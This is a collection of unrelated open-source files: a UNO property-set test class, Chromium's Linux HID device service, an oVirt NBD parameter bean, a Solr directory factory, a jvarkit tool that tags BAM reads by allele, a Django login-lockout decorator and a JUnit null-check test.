PropertySetMixin.BoundListeners(); prop.prepareSet( "Second", Any.VOID, (((Optional) ((Defaulted) value.Value).Value).IsPresent ? ((Optional) ((Defaulted) value.Value).Value).Value : Any.VOID), l); synchronized (this) { a2 = value; } l.notifyListeners(); } public int getThird() throws UnknownPropertyException { throw new UnknownPropertyException("Third", this); } public void setThird(int value) throws UnknownPropertyException { throw new UnknownPropertyException("Third", this); } public int getFourth() throws UnknownPropertyException { throw new UnknownPropertyException("Fourth", this); } public void setFourth(int value) throws UnknownPropertyException { throw new UnknownPropertyException("Fourth", this); } public com.sun.star.beans.XPropertySetInfo getPropertySetInfo() { return prop.getPropertySetInfo(); } public void setPropertyValue(String propertyName, Object value) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setPropertyValue(propertyName, value); } public Object getPropertyValue(String propertyName) throws UnknownPropertyException, WrappedTargetException { return prop.getPropertyValue(propertyName); } public void addPropertyChangeListener( String propertyName, XPropertyChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.addPropertyChangeListener(propertyName, listener); } public void removePropertyChangeListener( String propertyName, XPropertyChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.removePropertyChangeListener(propertyName, listener); } public void addVetoableChangeListener( String propertyName, XVetoableChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.addVetoableChangeListener(propertyName, listener); } public void removeVetoableChangeListener( String propertyName, XVetoableChangeListener listener) throws UnknownPropertyException, WrappedTargetException { prop.removeVetoableChangeListener(propertyName, listener); } public void setFastPropertyValue(int handle, Object value) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setFastPropertyValue(handle, value); } public Object getFastPropertyValue(int handle) throws UnknownPropertyException, WrappedTargetException { return prop.getFastPropertyValue(handle); } public PropertyValue[] getPropertyValues() { return prop.getPropertyValues(); } public void setPropertyValues(PropertyValue[] props) throws UnknownPropertyException, PropertyVetoException, com.sun.star.lang.IllegalArgumentException, WrappedTargetException { prop.setPropertyValues(props); } private final PropertySetMixin prop = new PropertySetMixin( context, this, new Type(XTest3.class), new String[] { "Third" }); private int a1 = 0; private Ambiguous a2 = new Ambiguous( new Defaulted(new Optional(), true), false); } private final XComponentContext context; }
4,203
2,151
<gh_stars>1000+ // Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "services/device/hid/hid_service_linux.h" #include <fcntl.h> #include <stdint.h> #include <limits> #include <memory> #include <string> #include <utility> #include "base/bind.h" #include "base/files/file.h" #include "base/files/file_path.h" #include "base/files/file_util.h" #include "base/files/scoped_file.h" #include "base/location.h" #include "base/macros.h" #include "base/sequence_checker.h" #include "base/sequenced_task_runner.h" #include "base/strings/string_number_conversions.h" #include "base/strings/string_split.h" #include "base/task_scheduler/post_task.h" #include "base/threading/thread_restrictions.h" #include "base/threading/thread_task_runner_handle.h" #include "build/build_config.h" #include "components/device_event_log/device_event_log.h" #include "device/udev_linux/scoped_udev.h" #include "device/udev_linux/udev_watcher.h" #include "services/device/hid/hid_connection_linux.h" #if defined(OS_CHROMEOS) #include "base/sys_info.h" #include "chromeos/dbus/dbus_thread_manager.h" #include "chromeos/dbus/permission_broker_client.h" #endif // defined(OS_CHROMEOS) namespace device { namespace { const char kHidrawSubsystem[] = "hidraw"; const char kHIDID[] = "HID_ID"; const char kHIDName[] = "HID_NAME"; const char kHIDUnique[] = "HID_UNIQ"; const char kSysfsReportDescriptorKey[] = "report_descriptor"; } // namespace struct HidServiceLinux::ConnectParams { ConnectParams(scoped_refptr<HidDeviceInfo> device_info, const ConnectCallback& callback) : device_info(std::move(device_info)), callback(callback), task_runner(base::ThreadTaskRunnerHandle::Get()), blocking_task_runner( base::CreateSequencedTaskRunnerWithTraits(kBlockingTaskTraits)) {} ~ConnectParams() {} scoped_refptr<HidDeviceInfo> device_info; ConnectCallback callback; scoped_refptr<base::SequencedTaskRunner> task_runner; scoped_refptr<base::SequencedTaskRunner> blocking_task_runner; base::ScopedFD fd; }; class HidServiceLinux::BlockingTaskHelper : public UdevWatcher::Observer { public: BlockingTaskHelper(base::WeakPtr<HidServiceLinux> service) : service_(std::move(service)), task_runner_(base::ThreadTaskRunnerHandle::Get()) { DETACH_FROM_SEQUENCE(sequence_checker_); } ~BlockingTaskHelper() override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); } void Start() { base::AssertBlockingAllowed(); DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); watcher_ = UdevWatcher::StartWatching(this); watcher_->EnumerateExistingDevices(); task_runner_->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::FirstEnumerationComplete, service_)); } private: // UdevWatcher::Observer void OnDeviceAdded(ScopedUdevDevicePtr device) override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); const char* device_path = udev_device_get_syspath(device.get()); if (!device_path) return; HidPlatformDeviceId platform_device_id = device_path; const char* subsystem = udev_device_get_subsystem(device.get()); if (!subsystem || strcmp(subsystem, kHidrawSubsystem) != 0) return; const char* str_property = udev_device_get_devnode(device.get()); if (!str_property) return; std::string device_node = str_property; udev_device* parent = udev_device_get_parent(device.get()); if (!parent) return; const char* hid_id = udev_device_get_property_value(parent, kHIDID); if (!hid_id) return; std::vector<std::string> parts = base::SplitString( hid_id, ":", base::TRIM_WHITESPACE, 
base::SPLIT_WANT_ALL); if (parts.size() != 3) return; uint32_t int_property = 0; if (!HexStringToUInt(base::StringPiece(parts[1]), &int_property) || int_property > std::numeric_limits<uint16_t>::max()) { return; } uint16_t vendor_id = int_property; if (!HexStringToUInt(base::StringPiece(parts[2]), &int_property) || int_property > std::numeric_limits<uint16_t>::max()) { return; } uint16_t product_id = int_property; std::string serial_number; str_property = udev_device_get_property_value(parent, kHIDUnique); if (str_property) serial_number = str_property; std::string product_name; str_property = udev_device_get_property_value(parent, kHIDName); if (str_property) product_name = str_property; const char* parent_sysfs_path = udev_device_get_syspath(parent); if (!parent_sysfs_path) return; base::FilePath report_descriptor_path = base::FilePath(parent_sysfs_path).Append(kSysfsReportDescriptorKey); std::string report_descriptor_str; if (!base::ReadFileToString(report_descriptor_path, &report_descriptor_str)) return; scoped_refptr<HidDeviceInfo> device_info(new HidDeviceInfo( platform_device_id, vendor_id, product_id, product_name, serial_number, // TODO(reillyg): Detect Bluetooth. crbug.com/443335 mojom::HidBusType::kHIDBusTypeUSB, std::vector<uint8_t>(report_descriptor_str.begin(), report_descriptor_str.end()), device_node)); task_runner_->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::AddDevice, service_, device_info)); } void OnDeviceRemoved(ScopedUdevDevicePtr device) override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); const char* device_path = udev_device_get_syspath(device.get()); if (device_path) { task_runner_->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::RemoveDevice, service_, std::string(device_path))); } } SEQUENCE_CHECKER(sequence_checker_); std::unique_ptr<UdevWatcher> watcher_; // This weak pointer is only valid when checked on this task runner. 
base::WeakPtr<HidServiceLinux> service_; scoped_refptr<base::SequencedTaskRunner> task_runner_; DISALLOW_COPY_AND_ASSIGN(BlockingTaskHelper); }; HidServiceLinux::HidServiceLinux() : blocking_task_runner_( base::CreateSequencedTaskRunnerWithTraits(kBlockingTaskTraits)), weak_factory_(this) { helper_ = std::make_unique<BlockingTaskHelper>(weak_factory_.GetWeakPtr()); blocking_task_runner_->PostTask( FROM_HERE, base::BindOnce(&BlockingTaskHelper::Start, base::Unretained(helper_.get()))); } HidServiceLinux::~HidServiceLinux() { blocking_task_runner_->DeleteSoon(FROM_HERE, helper_.release()); } base::WeakPtr<HidService> HidServiceLinux::GetWeakPtr() { return weak_factory_.GetWeakPtr(); } void HidServiceLinux::Connect(const std::string& device_guid, const ConnectCallback& callback) { DCHECK(thread_checker_.CalledOnValidThread()); const auto& map_entry = devices().find(device_guid); if (map_entry == devices().end()) { base::ThreadTaskRunnerHandle::Get()->PostTask( FROM_HERE, base::Bind(callback, nullptr)); return; } scoped_refptr<HidDeviceInfo> device_info = map_entry->second; auto params = std::make_unique<ConnectParams>(device_info, callback); #if defined(OS_CHROMEOS) chromeos::PermissionBrokerClient* client = chromeos::DBusThreadManager::Get()->GetPermissionBrokerClient(); DCHECK(client) << "Could not get permission broker client."; chromeos::PermissionBrokerClient::ErrorCallback error_callback = base::Bind(&HidServiceLinux::OnPathOpenError, params->device_info->device_node(), params->callback); client->OpenPath( device_info->device_node(), base::Bind(&HidServiceLinux::OnPathOpenComplete, base::Passed(&params)), error_callback); #else scoped_refptr<base::SequencedTaskRunner> blocking_task_runner = params->blocking_task_runner; blocking_task_runner->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::OpenOnBlockingThread, std::move(params))); #endif // defined(OS_CHROMEOS) } #if defined(OS_CHROMEOS) // static void HidServiceLinux::OnPathOpenComplete(std::unique_ptr<ConnectParams> params, base::ScopedFD fd) { scoped_refptr<base::SequencedTaskRunner> blocking_task_runner = params->blocking_task_runner; params->fd = std::move(fd); blocking_task_runner->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::FinishOpen, std::move(params))); } // static void HidServiceLinux::OnPathOpenError(const std::string& device_path, const ConnectCallback& callback, const std::string& error_name, const std::string& error_message) { HID_LOG(EVENT) << "Permission broker failed to open '" << device_path << "': " << error_name << ": " << error_message; callback.Run(nullptr); } #else // static void HidServiceLinux::OpenOnBlockingThread( std::unique_ptr<ConnectParams> params) { base::AssertBlockingAllowed(); scoped_refptr<base::SequencedTaskRunner> task_runner = params->task_runner; base::FilePath device_path(params->device_info->device_node()); base::File device_file; int flags = base::File::FLAG_OPEN | base::File::FLAG_READ | base::File::FLAG_WRITE; device_file.Initialize(device_path, flags); if (!device_file.IsValid()) { base::File::Error file_error = device_file.error_details(); if (file_error == base::File::FILE_ERROR_ACCESS_DENIED) { HID_LOG(EVENT) << "Access denied opening device read-write, trying read-only."; flags = base::File::FLAG_OPEN | base::File::FLAG_READ; device_file.Initialize(device_path, flags); } } if (!device_file.IsValid()) { HID_LOG(EVENT) << "Failed to open '" << params->device_info->device_node() << "': " << base::File::ErrorToString(device_file.error_details()); 
task_runner->PostTask(FROM_HERE, base::BindOnce(params->callback, nullptr)); return; } params->fd.reset(device_file.TakePlatformFile()); FinishOpen(std::move(params)); } #endif // defined(OS_CHROMEOS) // static void HidServiceLinux::FinishOpen(std::unique_ptr<ConnectParams> params) { base::AssertBlockingAllowed(); scoped_refptr<base::SequencedTaskRunner> task_runner = params->task_runner; if (!base::SetNonBlocking(params->fd.get())) { HID_PLOG(ERROR) << "Failed to set the non-blocking flag on the device fd"; task_runner->PostTask(FROM_HERE, base::BindOnce(params->callback, nullptr)); return; } task_runner->PostTask( FROM_HERE, base::BindOnce(&HidServiceLinux::CreateConnection, std::move(params))); } // static void HidServiceLinux::CreateConnection(std::unique_ptr<ConnectParams> params) { DCHECK(params->fd.is_valid()); params->callback.Run(base::MakeRefCounted<HidConnectionLinux>( std::move(params->device_info), std::move(params->fd), std::move(params->blocking_task_runner))); } } // namespace device
4,447
488
#ifndef __UNPARSER_ASSIST_H__ #define __UNPARSER_ASSIST_H__ extern void generateModFile(SgFile *sfile); #define MOD_FILE_SUFFIX ".rmod" #endif
65
347
<gh_stars>100-1000 package org.ovirt.engine.core.common.vdscommands; import org.ovirt.engine.core.common.utils.ToStringBuilder; import org.ovirt.engine.core.compat.Guid; public class NbdServerVDSParameters extends VdsIdVDSCommandParametersBase { private Guid serverId; private Guid storageDomainId; private Guid imageId; private Guid volumeId; private boolean readonly; private boolean detectZeroes; private boolean discard; // If true, export entire backing chain under specified volume. Otherwise // export only the specified volume. private boolean backingChain = true; private Guid bitmap; public NbdServerVDSParameters() { } public NbdServerVDSParameters(Guid vdsId) { super(vdsId); } public Guid getServerId() { return serverId; } public void setServerId(Guid serverId) { this.serverId = serverId; } public Guid getStorageDomainId() { return storageDomainId; } public void setStorageDomainId(Guid storageDomainId) { this.storageDomainId = storageDomainId; } public Guid getImageId() { return imageId; } public void setImageId(Guid imageId) { this.imageId = imageId; } public Guid getVolumeId() { return volumeId; } public void setVolumeId(Guid volumeId) { this.volumeId = volumeId; } public boolean isReadonly() { return readonly; } public void setReadonly(boolean readonly) { this.readonly = readonly; } public boolean isDetectZeroes() { return detectZeroes; } public void setDetectZeroes(boolean detectZeroes) { this.detectZeroes = detectZeroes; } public boolean isDiscard() { return discard; } public void setDiscard(boolean discard) { this.discard = discard; } public boolean getBackingChain() { return backingChain; } public void setBackingChain(boolean backingChain) { this.backingChain = backingChain; } public Guid getBitmap() { return bitmap; } public void setBitmap(Guid bitmap) { this.bitmap = bitmap; } @Override protected ToStringBuilder appendAttributes(ToStringBuilder tsb) { return super.appendAttributes(tsb) .append("serverId", serverId) .append("storageDomainId", storageDomainId) .append("imageId", imageId) .append("volumeId", volumeId) .append("readonly", readonly) .append("discard", discard) .append("detectZeroes", detectZeroes) .append("backingChain", backingChain) .append("bitmap", bitmap); } }
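A hypothetical caller-side sketch (not from the oVirt sources) showing how the parameter bean above might be filled in for a read-only, single-volume NBD export. Every Guid value is a made-up placeholder and Guid.newGuid() is assumed to exist in org.ovirt.engine.core.compat.Guid.

NbdServerVDSParameters params = new NbdServerVDSParameters(Guid.newGuid()); // id of the host (VDS) running the NBD server
params.setServerId(Guid.newGuid());
params.setStorageDomainId(Guid.newGuid());
params.setImageId(Guid.newGuid());
params.setVolumeId(Guid.newGuid());
params.setReadonly(true);        // expose the export read-only
params.setDetectZeroes(true);
params.setDiscard(false);
params.setBackingChain(false);   // export only the specified volume, not its whole backing chain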
1,140
1,104
<filename>trunk/adhoc-solr/src/main/java/org/apache/solr/core/DirectoryFactory.java package org.apache.solr.core; /** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import java.io.File; import java.io.IOException; import org.apache.lucene.store.Directory; import org.apache.solr.common.util.NamedList; import org.apache.solr.util.plugin.NamedListInitializedPlugin; /** * Provides access to a Directory implementation. * */ public abstract class DirectoryFactory implements NamedListInitializedPlugin { /** * Opens a Lucene directory * * @throws IOException */ public abstract Directory open(String path) throws IOException; public boolean exists(String path) { // back compat behavior File dirFile = new File(path); return dirFile.canRead(); } public void init(NamedList args) { } }
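A hypothetical minimal subclass (not shipped with Solr) illustrating the extension point above; it assumes a Lucene version in which SimpleFSDirectory still offers a File-based constructor. exists(String) and init(NamedList) keep the defaults inherited from DirectoryFactory.

import java.io.File;
import java.io.IOException;

import org.apache.lucene.store.Directory;
import org.apache.lucene.store.SimpleFSDirectory;
import org.apache.solr.core.DirectoryFactory;

public class LocalFSDirectoryFactory extends DirectoryFactory {
    /** Opens (creating if necessary) an index directory on the local filesystem. */
    @Override
    public Directory open(String path) throws IOException {
        return new SimpleFSDirectory(new File(path));
    }
}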
447
355
<gh_stars>100-1000 /* The MIT License (MIT) Copyright (c) 2021 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package com.github.lindenb.jvarkit.tools.biostar; import java.io.BufferedReader; import java.io.IOException; import java.nio.file.Path; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Set; import java.util.stream.Collectors; import com.github.lindenb.jvarkit.util.bio.SequenceDictionaryUtils; import com.github.lindenb.jvarkit.util.jcommander.Launcher; import com.github.lindenb.jvarkit.util.jcommander.Program; import com.github.lindenb.jvarkit.util.log.Logger; import com.github.lindenb.jvarkit.util.picard.SAMSequenceDictionaryProgress; import htsjdk.samtools.Cigar; import htsjdk.samtools.SAMFileHeader; import htsjdk.samtools.CigarElement; import htsjdk.samtools.CigarOperator; import htsjdk.samtools.SamReader; import htsjdk.samtools.SAMFileWriter; import htsjdk.samtools.SAMReadGroupRecord; import htsjdk.samtools.SAMRecord; import htsjdk.samtools.SAMRecordIterator; import htsjdk.samtools.SAMSequenceDictionary; import htsjdk.samtools.util.CloserUtil; import htsjdk.samtools.util.Interval; import htsjdk.samtools.util.IntervalTreeMap; import com.beust.jcommander.Parameter; import com.beust.jcommander.ParametersDelegate; import com.github.lindenb.jvarkit.io.IOUtils; import com.github.lindenb.jvarkit.lang.CharSplitter; import com.github.lindenb.jvarkit.lang.JvarkitException; import com.github.lindenb.jvarkit.lang.StringUtils; /** BEGIN_DOC The program removes all the existing read group and create some new one from the 'position file'. For now, only simple alleles are supported. Reads group are affected if a specific variant is found in the 'position file'. If two samples share the same group, the read group is AMBIGOUS. If the read is unmapped, the read group is UNMAPPED. If no sample is affected to a read, the read group will be UNAFFECTED; ## see also: * [https://www.biostars.org/p/283969](https://www.biostars.org/p/283969) " How to extract reads with a known variant form a bam file" ## Example the positions file ``` $ cat positions.tsv rotavirus 267 C SAMPLE1 rotavirus 267 G SAMPLE2 ``` processing : ``` $ java -jar dist/biostar214299.jar -p positions.tsv input.bam @HD VN:1.5 SO:coordinate @SQ SN:rotavirus LN:1074 @RG ID:UNAFFECTED SM:UNAFFECTED LB:UNAFFECTED @RG ID:UNMAPPED SM:UNMAPPED LB:UNMAPPED @RG ID:SAMPLE1 SM:SAMPLE1 LB:SAMPLE1 @RG ID:SAMPLE2 SM:SAMPLE2 LB:SAMPLE2 @RG ID:AMBIGOUS SM:AMBIGOUS LB:AMBIGOUS (...) 
rotavirus_237_744_6:0:0_3:0:0_29c 163 rotavirus 237 60 70M = 675 508 ATCCGGCGTTAAATGGAAAGTTTCGGTGATCTATTAGAAATAGAAATTGGATGACTGATTCAAAAACGGT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MD:Z:3A19A1C1C1G31T8 RG:Z:SAMPLE1 NM:i:6 AS:i:41 XS:i:0 rotavirus_234_692_6:0:1_4:0:0_3ac 163 rotavirus 237 60 6S30M5I1M5D28M = 623 456 TTGGTAATCAGGCGTTAAATGGAAAGTTTAGCTCAGGACAACGAAATAGAAATTGGATGACTGATTCTAA ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MD:Z:31^TATTA28 RG:Z:SAMPLE2 NM:i:10 AS:i:37 XS:i:0 rotavirus_237_777_6:0:0_7:0:0_216 99 rotavirus 237 60 70M = 708 541 ATCAGGGGTTAAATTGAAAGTTTAGCTCAGCTCTTAGACATAGAAATTGGATGACTGATTGTACAACGGT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MD:Z:6C7G17A5A21C2A6 RG:Z:SAMPLE1 NM:i:6 AS:i:40 XS:i:0 rotavirus_237_699_3:0:0_8:0:0_22f 163 rotavirus 237 60 70M = 650 463 ATGAGGCGTTAAATGGAAAGTTTATCTCAGCTATTAGAAATAGCAATTGGATGACTGATTCTAAAACGGT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ MD:Z:2C21G18A26 RG:Z:SAMPLE1 NM:i:3 AS:i:57 XS:i:0 (...) rotavirus_311_846_10:0:0_11:0:0_3d7 141 * 0 0 * * 0 0 AACTTAGATGAAGACGATCAAAACCTTAGAATGACTTTATGTTCTAAATGGCTCGACCCAAAGATGAGAG ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ RG:Z:UNMAPPED AS:i:0 XS:i:0 rotavirus_85_600_7:0:0_9:0:0_3e0 77 * 0 0 * * 0 0 AGCTGCAGTTGTTTCTGCTCCTTCAACATTAGAATTACTGGGTATTGAATATGATTCCAATGAAGTCTAT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ RG:Z:UNMAPPED AS:i:0 XS:i:0 rotavirus_85_600_7:0:0_9:0:0_3e0 141 * 0 0 * * 0 0 TATTTCTCCTTAAGCCTGTGTTTTATTGCATCAAATCTTTTTTCAAACTGCTCATAACGAGATTTCCACT ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ RG:Z:UNMAPPED AS:i:0 XS:i:0 ``` ## Cited In * Anatomy, transcription dynamics and evolution of wheat ribosomal RNA loci deciphered by a multi-omics approach. https://doi.org/10.1101/2020.08.29.273623 * Reciprocal allopolyploid grasses (Festuca × Lolium) display stable patterns of genome dominance . Marek Glombik & al. 2021. The plant journal. doi:10.1111/tpj.15375 END_DOC */ @Program(name="biostar214299", description="Extract allele specific reads from bamfiles", biostars=214299, keywords={"sam","bam","variant","snp"}, creationDate="20160930", modificationDate="20200924" ) public class Biostar214299 extends Launcher { private static final Logger LOG = Logger.build(Biostar214299.class).make(); @Parameter(names={"-o","--output"},description=OPT_OUPUT_FILE_OR_STDOUT) private Path outputFile = null; @Parameter(names={"-p","--positions"},description="Position file. 
A Tab delimited file containing the following 4 column: (1)chrom (2)position (3) allele A/T/G/C (4) sample name.",required=true) private Path positionFile = null; @Parameter(names={"-R","--reference"},description=CRAM_INDEXED_REFENCE) private Path reference = null; @ParametersDelegate private WritingBamArgs writingBamArgs = new WritingBamArgs(); private static class Position { //String contig; int refpos; final Map<Character,String> base2sample = new HashMap<>(); @Override public String toString() { return "pos:"+this.refpos+" "+this.base2sample; } } @Override public int doWork(final List<String> args) { if(this.positionFile==null) { LOG.error("position File is not defined."); return -1; } final String UNAFFECTED_SAMPLE="UNAFFECTED"; final String AMBIGOUS_SAMPLE="AMBIGOUS"; final String UNMAPPED="UNMAPPED"; SamReader sfr=null; SAMFileWriter sfw=null; final IntervalTreeMap<Position> positionsTreeMap = new IntervalTreeMap<>(); final Set<String> samples = new HashSet<>(); try { sfr = openSamReader(oneFileOrNull(args)); final SAMFileHeader header=sfr.getFileHeader(); final SAMSequenceDictionary dict = SequenceDictionaryUtils.extractRequired(header); try ( BufferedReader br = IOUtils.openPathForBufferedReading(this.positionFile)) { String line; final CharSplitter tab = CharSplitter.TAB; while((line=br.readLine())!=null) { if(StringUtils.isBlank(line) || line.startsWith("#")) continue; final String tokens[]=tab.split(line); if(tokens.length<4) { LOG.error("Not enough columns in "+line); return -1; } final String contig = tokens[0]; if(dict.getSequence(contig)==null) { LOG.error(JvarkitException.ContigNotFoundInDictionary.getMessage(contig, dict)); return -1; } final int refpos = Integer.parseInt(tokens[1]); final Interval interval = new Interval(contig, refpos, refpos); Position position = positionsTreeMap.get(interval); if(position==null) { position = new Position(); //position.contig = contig; position.refpos = refpos; positionsTreeMap.put(interval, position); } final String bases = tokens[2].toUpperCase(); if(bases.length()!=1 || !bases.matches("[ATGC]")) { LOG.error("in "+line+" bases should be one letter and ATGC"); return -1; } if(position.base2sample.containsKey(bases.charAt(0))) { LOG.error("in "+line+" bases already defined for this position"); return -1; } final String sampleName = tokens[3].trim(); if(sampleName.isEmpty()) { LOG.error("sample name cannot be empty"); return -1; } samples.add(sampleName); position.base2sample.put(bases.charAt(0), sampleName); } } catch (final IOException err) { LOG.error(err); return -1; } if(samples.contains(UNAFFECTED_SAMPLE)) { LOG.error("Sample cannot be named "+UNAFFECTED_SAMPLE); return -1; } if(samples.contains(AMBIGOUS_SAMPLE)) { LOG.error("Sample cannot be named "+AMBIGOUS_SAMPLE); return -1; } if(samples.contains(UNMAPPED)) { LOG.error("Sample cannot be named "+UNMAPPED); return -1; } samples.add(UNAFFECTED_SAMPLE); samples.add(AMBIGOUS_SAMPLE); samples.add(UNMAPPED); final SAMFileHeader newHeader = new SAMFileHeader(); newHeader.setSortOrder(header.getSortOrder()); newHeader.setSequenceDictionary(dict); newHeader.addComment("generated with "+getProgramName()+" "+getVersion()+" <NAME> : "+getProgramCommandLine()); /* create groups */ for(final String sample: samples) { final SAMReadGroupRecord rg = new SAMReadGroupRecord(sample); rg.setSample(sample); rg.setLibrary(sample); newHeader.addReadGroup(rg); } sfw = this.writingBamArgs.setReferencePath(this.reference).openSamWriter(this.outputFile,newHeader, true); final SAMSequenceDictionaryProgress 
progress= new SAMSequenceDictionaryProgress(header).logger(LOG); final SAMRecordIterator iter = sfr.iterator(); while(iter.hasNext()) { final SAMRecord rec = progress.watch(iter.next()); rec.setAttribute("RG",null); if(rec.getReadUnmappedFlag()) { rec.setAttribute("RG",UNMAPPED); sfw.addAlignment(rec); continue; } final Cigar cigar = rec.getCigar(); final Collection<Position> snps = positionsTreeMap.getContained(new Interval(rec.getContig(),rec.getUnclippedStart(),rec.getUnclippedEnd())); if(snps== null || snps.isEmpty()) { rec.setAttribute("RG",UNAFFECTED_SAMPLE); sfw.addAlignment(rec); continue; } final Map<Integer,Position> index2pos= snps.stream(). collect(Collectors.toMap(P->P.refpos,P->P)); final Set<String> selectedSamples = new HashSet<>(); final byte bases[] =rec.getReadBases(); if(bases==null || bases.equals(SAMRecord.NULL_SEQUENCE)) { LOG.error("Bases missing in read "+rec); return -1; } int refPos1=rec.getUnclippedStart(); int readPos0=0; for(final CigarElement ce:cigar.getCigarElements()) { final CigarOperator op = ce.getOperator(); final boolean consummeReadBaseOrSoftClip= op.consumesReadBases() || op.equals(CigarOperator.S); if(op.consumesReferenceBases() && consummeReadBaseOrSoftClip) { for(int i=0;i< ce.getLength();++i){ final int nowRefPos1 = (refPos1+i); final int nowReadPos0 = (readPos0+i); final Position position = index2pos.get(nowRefPos1); if(position==null) continue; if(nowReadPos0>= bases.length) continue; final char base = (char)Character.toUpperCase(bases[nowReadPos0]); final String sample = position.base2sample.get(base); if(sample==null) continue; selectedSamples.add(sample); index2pos.remove(nowRefPos1); if(index2pos.isEmpty()) break; } } if(op.consumesReferenceBases() || op.isClipping()) { refPos1+=ce.getLength(); } if(consummeReadBaseOrSoftClip) { readPos0+=ce.getLength(); } } if(selectedSamples.isEmpty()) { rec.setAttribute("RG",UNAFFECTED_SAMPLE); } else if(selectedSamples.size()==1) { rec.setAttribute("RG",selectedSamples.iterator().next()); } else { rec.setAttribute("RG",AMBIGOUS_SAMPLE); } sfw.addAlignment(rec); } progress.finish(); return 0; } catch(final Throwable err) { LOG.error(err); return -1; } finally { CloserUtil.close(sfr); CloserUtil.close(sfw); } } public static void main(final String[] args) { new Biostar214299().instanceMainWithExit(args); } }
5,748
417
from . import utils import functools def watch_login(status_code=302, msg="", get_username=utils.get_username_from_request): """ Used to decorate the django.contrib.admin.site.login method or any other function you want to protect by brute forcing. To make it work on normal functions just pass the status code that should indicate a failure and/or a string that will be checked within the response body. """ def decorated_login(func): @functools.wraps(func) def wrapper(request, *args, **kwargs): # if the request is currently under lockout, do not proceed to the # login function, go directly to lockout url, do not pass go, # do not collect messages about this login attempt if utils.is_already_locked(request): return utils.lockout_response(request) # call the login function response = func(request, *args, **kwargs) if request.method == "POST": # see if the login was successful if status_code == 302: # standard Django login view login_unsuccessful = ( response and not response.has_header("location") and response.status_code != status_code ) else: # If msg is not passed the last condition will be evaluated # always to True so the first 2 will decide the result. login_unsuccessful = ( response and response.status_code == status_code and msg in response.content.decode("utf-8") ) # ideally make this background task, but to keep simple, # keeping it inline for now. utils.add_login_attempt_to_db( request, not login_unsuccessful, get_username ) if utils.check_request(request, login_unsuccessful, get_username): return response return utils.lockout_response(request) return response return wrapper return decorated_login
1,033
32,544
<reponame>DBatOWL/tutorials<gh_stars>1000+ package com.baeldung.nulls; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; import static org.junit.jupiter.api.Assertions.assertDoesNotThrow; import static org.junit.jupiter.api.Assertions.assertThrows; class UsingObjectsUnitTest { private UsingObjects classUnderTest; @BeforeEach public void setup() { classUnderTest = new UsingObjects(); } @Test public void whenArgIsNull_thenThrowException() { assertThrows(NullPointerException.class, () -> classUnderTest.accept(null)); } @Test public void whenArgIsNonNull_thenDoesNotThrowException() { assertDoesNotThrow(() -> classUnderTest.accept("test ")); } }
281
1,772
